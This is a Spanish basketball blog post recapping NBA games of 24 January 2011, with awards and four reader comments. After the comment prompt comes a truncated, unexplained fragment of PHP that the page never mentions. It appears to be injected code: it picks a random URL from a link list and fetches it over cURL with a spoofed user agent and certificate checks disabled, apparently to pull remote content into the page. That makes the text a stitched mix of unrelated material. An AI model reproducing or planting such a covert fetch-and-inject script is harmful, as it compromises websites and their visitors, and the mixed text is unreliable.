La Crónica (24/01/2011)

25 de January de 2011 por TheDeerHunter

Susto de los gordos en los San Antonio Spurs. Duncan hace la continuación a un bloqueo, realiza un mal giro, y se va al suelo doliéndose de la rodilla. El típico caso de lesión grave que se hace uno solo y que a buen seguro habría dado al traste con las aspiraciones de los actuales líderes de la liga. Por suerte, poco después volvía a la cancha para ayudar a ganar a los Warriors (113-102).

Los Hornets también se encuentran ahora mismo en la cresta de la ola. Con una canasta increíble de West a 5 décimas para el final cerró un complicado choque contra los Thunder (89-91). Ni Westbrook ni Durant brillaron pero sí lograron ayuda de Green e Ibaka para llegar dominando al último cuarto. Ahí surgió Chris Paul mostrando todas sus virtudes: defensa, distribución, decisión… todo lo que hace falta para dar la vuelta a la tortilla. Como puntilla, buzzer beater de David West. 9ª victoria seguida y adelantan a los Mavs en la Southwest. A los Spurs será imposible.

En el Este Orlando se dio un batacazo en casa contra Detroit (103-96). Excesiva comodidad para T-Mac y Tayshaun, además de Daye y Gordon. El equipo de Van Gundy pecó en defensa y regaló demasiados balones. Lo pagó caro y es imperdonable para quien pretende posicionarse contra potencias como los Celtics, Miami o los Bulls. Estos últimos no fallaron contra los Bucks (83-92). Malamente está Andrew Bogut para permitir que Kurt Thomas hiciera un destrozo como el de anoche. Rose, Boozer y el resto no estuvieron demasiado finos.

En las zonas bajas de Playoffs los Knicks rompieron su pésima racha contra los Wizards (106-115). Buen partido en general de los de D’Antoni, aunque a Fields parece que le ha llegado el rookie wall. Por su parte, los Sixers se afianzan en plaza de postemporada con otro gran partido de Brand y una gran actuación de Evan Turner, entre otros (95-105).

Los Blazers realizaron un pésimo partido contra los Kings (96-81) y tanto Grizzlies, a costa de Toronto (100-98), como Houston, a costa de Minnesotta (129-125), pudieron reducir distancias.

Para terminar, los Nets también fueron capaces de ganar a los Cavs (101-103) con canasta de Brook Lopez en los últimos segundos.

PREMIOS

MVP: Amare Stoudamire fue clave para que los Knicks levantaran el vuelo. Los 30 puntos, 9 rebotes y 5 asistencias del ex de Phoenix fueron demasiado para unos tristes Wizards.

Rookie: Debe de ser lo único ilusionante en Washington. John Wall luchó lo indecible pero no llevó a su equipo a la victoria. Sus 18 puntos, 7 rebotes y 9 asistencias se quedaron en nada.

Sorpresa: Milwaukee concentró todos sus esfuerzos en parar a Derrick Rose y Carlos Boozer y dejó más que libre a un veterano como Kurt Thomas. Este agradeció el detalle con 22 puntos, 9 rebotes y 5 asistencias. La experiencia es un grado.

Decepción: Horrible partido de Rudy Fernandez, un 1 de 10 en tiro que lastra cualquier aspiración de los Blazers.

Esfuerzo en vano: Tal para cual. 31 puntos y 12 rebotes para David Lee y 24 puntos, 17 rebotes y 7 asistencias para Kevin Love. Ambos se quedaron sin justo premio.

Comenta

4 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Ayer vi el Magic-Pistons. Como dice la crónica la defensa de Orlando dio muchas facilidades sobre todo en la primera parte para alguien que pretende ser aspirante al anillo. Sufrieron lo indecible para parar a los aleros altos de los Pistons (Prince y Daye les hicieron polvo) y además si Turkoglu y Richardson llevan 0 puntos al descanso y no mejoran mucho en la segunda parte pues pasa lo que pasa. Orlando parece varios pasos por detrás de Boston, Miami y Chicago que parecen los 3 conjuntos más potentes en el Este. Por Detroit una delicia ver jugar a T-Mac en la primera parte, que clase para anotar casi sin físico y cómo entiende el juego desde esa posición de base en la que está jugando ahora. Lástima que juegue al 50% como mucho de su capacidad física. Los Pistons bien en defensa y aprovechando mucho las facilidades de Orlando en ataque. RIP Hamilton ni un segundo en cancha ¿Alguien dijo trade antes de que acabe el tiempo?

      Citar

  2. TheDeerHunter dice:
    #2

    Rip lleva semanas con ni un segundo en cancha. A veces la NBA me da asco con ciertas actitudes…

      Citar

  3. sergio dice:
    #3

    Los Magic tras el traspaso han perdido defensa y parecen haberse quedado con el mas malo en el cambio Lewis-Arenas (no lo esta haciendo mal Rashard en la capital). Han ganado algo de distribucion en el juego y una capacidad anotadora imprevisible en algunos jugadores. Si Arenas, Jason Richardson o Turkoglu tienen el dia pueden ganar a cualquier equipo… pero por desgracia eso ocurre poco ultimamente. Esperemos que lleguen mas conjuntados a postemporada. Por cierto, me quito el sombrero ante Ryan Anderson. Él y Bass tienen una valoracion similar durante el presente curso a Arenas, Turkoglu o Nelson jugando de 10 a 6 min menos por partido.

      Citar

  4. Scriers dice:
    #4

    Lo que no se puede quejar Tmac es que no le hayan dado minutos y opciones. Porque recuperarlo está costando un puñao. Y va a seguir dando las de arena, pero es que cuando da las de cal es una delicia. Lo que ha perdido es muchísimo tiro. Se crea sus propias canastas posteando o en penetración, pero le cuesta mucho meterlas de lejos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>